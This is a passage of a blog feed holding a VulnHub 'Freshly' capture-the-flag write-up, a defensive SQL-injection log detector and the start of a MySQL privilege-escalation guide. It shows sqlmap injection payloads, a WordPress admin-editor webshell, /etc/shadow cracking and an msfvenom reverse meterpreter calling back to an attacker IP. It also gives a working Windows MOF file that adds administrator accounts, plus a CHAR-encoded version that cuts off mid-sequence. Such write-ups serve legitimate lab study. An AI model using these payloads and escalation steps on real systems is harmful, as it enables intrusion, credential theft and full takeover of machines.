class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span 
class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).</span><br><span class="line">...</span><br><span class="line">[+] WordPress theme in use: twentythirteen</span><br><span class="line">...</span><br><span class="line">| Version: 1.4 (80% confidence)</span><br><span class="line"></span><br><span class="line">[i] Plugin(s) Identified:</span><br><span class="line"></span><br><span class="line">[+] all-in-one-seo-pack</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/</span><br><span class="line"> | Last Updated: 2019-02-20T19:20:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 2.12</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Comment (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 5 vulnerabilities identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] 
Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure</span><br><span class="line"> | Fixed in: 2.2.6</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7881</span><br><span class="line"> | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902</span><br><span class="line"> | - http://jvn.jp/en/jp/JVN75615300/index.html</span><br><span class="line"> | - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.2.6.2</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7916</span><br><span class="line"> | - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.3.7</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8538</span><br><span class="line"> | - http://seclists.org/fulldisclosure/2016/Jul/23</span><br><span class="line"> | - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> | - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html</span><br><span class="line"> | - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability</span><br><span class="line"> | - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/</span><br><span class="line"> |</span><br><span class="line"> | [!] 
Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.3.8</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8558</span><br><span class="line"> | - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/</span><br><span class="line"> | - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)</span><br><span class="line"> | Fixed in: 2.10</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/9159</span><br><span class="line"> | - https://www.ripstech.com/php-security-calendar-2018/#day-4</span><br><span class="line"> | - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/</span><br><span class="line"> | - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/</span><br><span class="line"> |</span><br><span class="line"> | Version: 2.2.5.1 (60% confidence)</span><br><span class="line"> | Detected By: Comment (Passive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'</span><br><span class="line"></span><br><span class="line">[+] cart66-lite</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/</span><br><span class="line"> | Last Updated: 2016-01-27T21:11:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 1.5.8</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 
2 vulnerabilities identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection</span><br><span class="line"> | Fixed in: 1.5.4</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/7737</span><br><span class="line"> | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442</span><br><span class="line"> | - https://research.g0blin.co.uk/cve-2014-9442/</span><br><span class="line"> |</span><br><span class="line"> | [!] Title: Cart66 Lite 1.5.4 - XSS</span><br><span class="line"> | Fixed in: 1.5.5</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/8014</span><br><span class="line"> | - http://packetstormsecurity.com/files/130307/</span><br><span class="line"> |</span><br><span class="line"> | Version: 1.5.3 (100% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt</span><br><span class="line"> | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt</span><br><span class="line"></span><br><span class="line">[+] contact-form-7</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/</span><br><span class="line"> | Last Updated: 2018-12-18T18:05:00.000Z</span><br><span class="line"> | [!] The version is out of date, the latest version is 5.1.1</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 1 vulnerability identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] 
Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation</span><br><span class="line"> | Fixed in: 5.0.4</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/9127</span><br><span class="line"> | - https://contactform7.com/2018/09/04/contact-form-7-504/</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7</span><br><span class="line"> | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7</span><br><span class="line"> | - https://www.ripstech.com/php-security-calendar-2018/#day-18</span><br><span class="line"> |</span><br><span class="line"> | Version: 4.1 (100% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt</span><br><span class="line"> | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt</span><br><span class="line"></span><br><span class="line">[+] proplayer</span><br><span class="line"> | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/</span><br><span class="line"> |</span><br><span class="line"> | Detected By: Urls In Homepage (Passive Detection)</span><br><span class="line"> |</span><br><span class="line"> | [!] 1 vulnerability identified:</span><br><span class="line"> |</span><br><span class="line"> | [!] 
Title: ProPlayer 4.7.9.1 - SQL Injection</span><br><span class="line"> | References:</span><br><span class="line"> | - https://wpvulndb.com/vulnerabilities/6912</span><br><span class="line"> | - https://www.exploit-db.com/exploits/25605/</span><br><span class="line"> |</span><br><span class="line"> | Version: 4.7.9.1 (80% confidence)</span><br><span class="line"> | Detected By: Readme - Stable Tag (Aggressive Detection)</span><br><span class="line"> | - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt</span><br></pre></td></tr></table></figure></p><p>The scan returned the WordPress version, the installed plugins and their known vulnerabilities. I tested the plugins listed above that have SQL injection vulnerabilities, but none of the attempts succeeded. </p><p>Enumerate usernames:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u</span><br></pre></td></tr></table></figure></p><p>Result:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[i] User(s) Identified:</span><br><span class="line"></span><br><span class="line">[+] admin</span><br><span class="line"> | Detected By: Rss Generator (Passive Detection)</span><br><span class="line"> | Confirmed By:</span><br><span class="line"> | Rss Generator (Aggressive Detection)</span><br><span class="line"> | Author Id Brute Forcing - Author Pattern (Aggressive Detection)</span><br><span class="line"> | Login Error Messages (Aggressive Detection)</span><br></pre></td></tr></table></figure></p><p>Password attack:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url 
http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt</span><br></pre></td></tr></table></figure></p><p>No password was obtained.</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>Directory scan</h3><p>A 御剑 (Yujian) scan of <a href="http://192.168.1.104/" target="_blank" rel="noopener">http://192.168.1.104/</a> found phpmyadmin and login.php<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/3.png" alt=""><br>phpmyadmin could not be logged into.</p><h2 id="渗透"><a href="#渗透" class="headerlink" title="渗透"></a>Penetration</h2><h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>SQL injection</h3><p>On login.php:<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/7.png" alt=""><br>Entering admin' or sleep(10)# makes the page response pause noticeably.<br>Injection is present; use sqlmap:</p><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms</p></blockquote></blockquote><p>No injection point found; raise the level:</p><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms --level=5 --risk=3</p></blockquote></blockquote><p>Injection point found:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:</span><br><span class="line">---</span><br><span class="line">Parameter: user (POST)</span><br><span class="line"> Type: AND/OR time-based blind</span><br><span class="line"> Title: MySQL >= 5.0.12 AND time-based blind</span><br><span class="line"> 
Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit</span><br><span class="line">---</span><br><span class="line">do you want to exploit this SQL injection? [Y/n] y</span><br><span class="line">[23:21:08] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Linux Ubuntu</span><br><span class="line">web application technology: Apache 2.4.7, PHP 5.5.9</span><br><span class="line">back-end DBMS: MySQL >= 5.0.12</span><br></pre></td></tr></table></figure></p><p>Run the following commands in turn: </p><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms --dbs</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms --tables -D "wordpress8080"</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms --columns -T "users" -D "wordpress8080"</p></blockquote></blockquote><blockquote><blockquote><p>sqlmap.py -u "<a href="http://192.168.1.104/login.php" target="_blank" rel="noopener">http://192.168.1.104/login.php</a>" --forms --dump -C "username,password" -T "users" -D "wordpress8080"</p></blockquote></blockquote><p>Obtained the WordPress account and password:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span 
class="line">Table: users</span><br><span class="line">[1 entry]</span><br><span class="line">+----------+---------------------+</span><br><span class="line">| username | password |</span><br><span class="line">+----------+---------------------+</span><br><span class="line">| admin | SuperSecretPassword |</span><br><span class="line">+----------+---------------------+</span><br></pre></td></tr></table></figure></p><h3 id="wordpress后台getshell"><a href="#wordpress后台getshell" class="headerlink" title="wordpress后台getshell"></a>Getting a shell from the WordPress admin panel</h3><p>After logging into the WordPress admin panel, go to Appearance - Editor, pick any PHP file and write a one-line webshell into it, then connect with 菜刀 (China Chopper):<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/4.png" alt=""><br><img src="/2019/04/19/VulnHub-Freshly-Writeup/5.png" alt=""><br>Open the virtual terminal in Chopper:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[/etc/]$ id</span><br><span class="line">uid=1(daemon) gid=1(daemon) groups=1(daemon)</span><br></pre></td></tr></table></figure></p><p>The current user is not root.<br>View the /etc/passwd file:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">libuuid:x:100:101::/var/lib/libuuid:</span><br><span class="line">syslog:x:101:104::/home/syslog:/bin/false</span><br><span class="line">messagebus:x:102:105::/var/run/dbus:/bin/false</span><br><span class="line">user:x:1000:1000:user,,,:/home/user:/bin/bash</span><br><span class="line">mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">candycane:x:1001:1001::/home/candycane:</span><br><span class="line"># YOU STOLE MY SECRET FILE!</span><br><span class="line"># SECRET = "NOBODY EVER 
GOES IN, AND NOBODY EVER COMES OUT!"</span><br></pre></td></tr></table></figure></p><p>The file contains a hint; presumably the password is meant to be cracked.<br>Download /etc/passwd and /etc/shadow, then on Kali: </p><blockquote><blockquote><p>unshadow passwd shadow > hashes.txt</p></blockquote></blockquote><p>Add SuperSecretPassword to /usr/share/john/password.lst as well, then:</p><blockquote><blockquote><p>john hashes.txt</p></blockquote></blockquote><p><img src="/2019/04/19/VulnHub-Freshly-Writeup/6.png" alt=""><br>The root user's password turns out to be SuperSecretPassword.</p><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h3><p>Generate a reverse meterpreter payload with msf:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php</span><br></pre></td></tr></table></figure></p><p>Upload frenshly.php to the target with Chopper, then set up the msf listener. Once the reverse meterpreter session arrives, run the shell command to enter a shell console; entering "su - root" complains that it must be run from a terminal, so run python -c 'import pty;pty.spawn("/bin/bash")' to get a terminal and complete the privilege escalation.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > sysinfo</span><br><span class="line">Computer : Freshly</span><br><span class="line">OS : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686</span><br><span 
class="line">Meterpreter : php/linux</span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: daemon (1)</span><br><span class="line">meterpreter > shell</span><br><span class="line">Process 1384 created.</span><br><span class="line">Channel 0 created.</span><br><span class="line">su - root</span><br><span class="line">su: must be run from a terminal</span><br><span class="line">python -c 'import pty;pty.spawn("/bin/bash")'</span><br><span class="line">tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent</span><br><span class="line"></span><br><span class="line">tythirteen$ su - root </span><br><span class="line">su - root</span><br><span class="line">Password: SuperSecretPassword</span><br><span class="line"></span><br><span class="line">root@Freshly:~# id</span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br></pre></td></tr></table></figure></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><ul><li>Information gathering is critical: the target's ports, directories and so on must be fully enumerated</li><li>Raising sqlmap's level and risk parameters makes the testing more thorough</li><li>Get familiar with the tools on Kali: wpscan, john</li></ul>]]></content>
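The manual sleep(10) probe and sqlmap's SLEEP(5) payload shown in this write-up leave a recognisable trace in any log that records form fields. The following is an added example, not part of the original write-up: a small detector run over constructed request-log lines (an assumed tab-separated "METHOD PATH field=value ..." format, as a WAF audit log or application request log might record the login form) that flags time-based blind SQL injection probes.

```python
"""Flag time-based blind SQL injection probes in request logs.

Added example, not part of the original write-up. The log format is an
assumption: one request per line, tab-separated as
    METHOD  PATH  field=value  field=value ...
with form values URL-encoded. The sample lines below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Delay functions that only appear in an injection context: the manual probe
# used sleep(10); sqlmap's time-based payload used SLEEP(5).
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# A quote closing the original literal, followed by a logical operator,
# as in  admin' or ...  or  admin'||(...)
BREAKOUT = re.compile(r"""['"]\s*(or\b|and\b|\|\|)""", re.I)

# Constructed sample log: a benign login, the manual probe, sqlmap's payload,
# and a benign WordPress login.
SAMPLE_LOG = [
    "POST\t/login.php\tuser=admin\tpassword=hunter2\ts=Submit",
    "POST\t/login.php\tuser=admin%27+or+sleep%2810%29%23\tpassword=x\ts=Submit",
    "POST\t/login.php\tuser=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'\tpassword=uUbb\ts=Submit",
    "GET\t/wordpress/wp-login.php\tlog=admin\tpwd=password",
]


def decode(value):
    """URL-decode until stable, since probes are often double-encoded."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value


def parse_line(line):
    """Split one log line into (method, path, {field: raw_value})."""
    parts = line.rstrip("\n").split("\t")
    method, path, fields = parts[0], parts[1], {}
    for token in parts[2:]:
        name, _, raw = token.partition("=")
        fields[name] = raw
    return method, path, fields


def score_value(value):
    """0 = nothing suspicious, 2 = delay function, 3 = delay function plus breakout."""
    score = 0
    if TIME_FUNCS.search(value):
        score += 2
        if BREAKOUT.search(value):
            score += 1
    return score


def scan(lines):
    """Return one finding per form field whose decoded value carries a delay probe."""
    findings = []
    for number, line in enumerate(lines, start=1):
        method, path, fields = parse_line(line)
        for name, raw in fields.items():
            decoded = decode(raw)
            score = score_value(decoded)
            if score >= 2:
                findings.append({"line": number, "method": method, "path": path,
                                 "field": name, "value": decoded, "score": score})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} {f['path']} field={f['field']} "
              f"score={f['score']} value={f['value']!r}")
```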
<summary type="html">
<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>Goal</h2><p>The goal of this challenge is to break into the machine via the web an
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
</entry>
<entry>
<title>MySQL privilege escalation summary</title>
<link href="http://yoursite.com/2019/04/17/mysql%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/"/>
<id>http://yoursite.com/2019/04/17/mysql提权总结/</id>
<published>2019-04-17T03:18:11.000Z</published>
<updated>2019-04-17T03:25:57.217Z</updated>
<content type="html"><![CDATA[<h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>MOF privilege escalation</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>Principle</h3><p>On Windows, the file c:/windows/system32/wbem/mof/nullevt.mof is executed with SYSTEM privileges at short, regular intervals, so if we store what we want done as code in this MOF file, we obtain elevated privileges. </p><h3 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>Preconditions</h3><p>1. The MySQL user has root privileges (the directory above is writable)<br>2. secure-file-priv is disabled</p><h3 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>Exploitation</h3><p>Save the code below as nullevt.mof and upload it to c:/windows/system32/wbem/mof/nullevt.mof, or use the mysql_mof module in msf directly<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select load_file("C:/php/APMServ5.2.6/www/htdocs/1.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"</span><br></pre></td></tr></table></figure></p><h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>Code</h4><p>This version does not add the user to the Administrators group<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#pragma namespace("\\\\.\\root\\subscription") </span><br><span class="line">instance of __EventFilter as $EventFilter </span><br><span class="line">{ </span><br><span 
class="line"> EventNamespace = "Root\\Cimv2"; </span><br><span class="line"> Name = "filtP2"; </span><br><span class="line"> Query = "Select * From __InstanceModificationEvent "</span><br><span class="line"> "Where TargetInstance Isa \"Win32_LocalTime\" "</span><br><span class="line"> "And TargetInstance.Second = 5"; </span><br><span class="line"> QueryLanguage = "WQL"; </span><br><span class="line">}; </span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer </span><br><span class="line">{ </span><br><span class="line">Name = "consPCSV2"; </span><br><span class="line">ScriptingEngine = "JScript"; </span><br><span class="line">ScriptText = </span><br><span class="line">"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; </span><br><span class="line">}; </span><br><span class="line">instance of __FilterToConsumerBinding </span><br><span class="line">{ </span><br><span class="line">Consumer = $Consumer; </span><br><span class="line">Filter = $EventFilter; </span><br><span class="line">};</span><br></pre></td></tr></table></figure></p><p>Adding to the Administrators group:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup Administrators hacker /add\")";</span><br></pre></td></tr></table></figure></p><h4 id="ascii形式"><a href="#ascii形式" class="headerlink" title="ascii形式"></a>ASCII form</h4><p>Adding the user<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT 
CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,